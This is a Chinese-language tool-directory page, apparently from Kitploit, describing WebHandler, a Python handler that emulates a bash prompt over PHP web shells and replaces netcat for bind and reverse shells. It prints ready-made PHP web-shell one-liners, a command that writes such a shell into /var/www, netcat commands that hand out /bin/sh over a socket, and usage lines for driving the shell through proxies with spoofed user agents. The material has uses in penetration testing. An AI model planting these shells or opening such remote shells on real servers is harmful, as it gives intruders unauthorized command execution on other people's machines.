Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
webhandler — 使用PHP系统函数控制服务器的Bash模拟器。 | Kitploit
工具/GitHubGitHub/lnxg33k/webhandler
Payload生成IDS/IPS规避Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHublnxg33k/webhandler

webhandler

使用PHP系统函数控制服务器的Bash模拟器。

查看仓库
1002445年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WebHandler


一个用于PHP系统函数的处理程序,同时也是‘netcat’处理程序的替代品 我的图片

信息


WebHandler试图模拟一个‘Linux bash提示符’来处理和处理:

root@kitploit:~
- PHP程序执行函数 _(例如 `system`、`passthru`、`exec` 等)_
- 绑定Shell连接
- 反向Shell连接

另一个功能是伪造HTTP头中的“User-Agent”字段。(--random-angent)。

它还支持HTTP代理(--proxy http://<ip>:<port>)

  • WebHandler适用于POST和GET请求:

    • <?php system($_GET['cmd']); ?>
    • <?php passthru($_REQUEST['cmd']); ?>
    • <?php echo exec($_POST['cmd']); ?>
  • WebHandler是netcat连接的替代品。

    一个绑定连接的例子(例如 nc -lvvp 1234 -e /bin/sh)

    通常用户会这样做:

    • netcat -l -p 1234
    • nc -lvvp 1234

    一个反向连接的例子(例如 nc 127.0.0.1 4321 -e /bin/sh)

    通常用户会这样做:

    • netcat -l -p 4321
    • nc -lvvp 4321

用法


  • --Example file:

    • echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
  • --url 是发送GET或POST请求时的必需参数(例如基于Web的PHP绑定连接):

    • python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    • python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
  • --listen 是等待连接时的必需参数(例如原始反向连接):

    • python webhandler.py --listen 1234

依赖项


如果你的 Python 版本低于 2.7.x,则 argparse 是必需的 运行以下命令安装:sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse 或者 sudo pip --install argparse。

readline 是可选的。 该模块用于提供丰富的行编辑和历史记录功能。

git 是可选的。 这使得项目能够保持最新。

链接


Wiki

Known Bugs

下载工具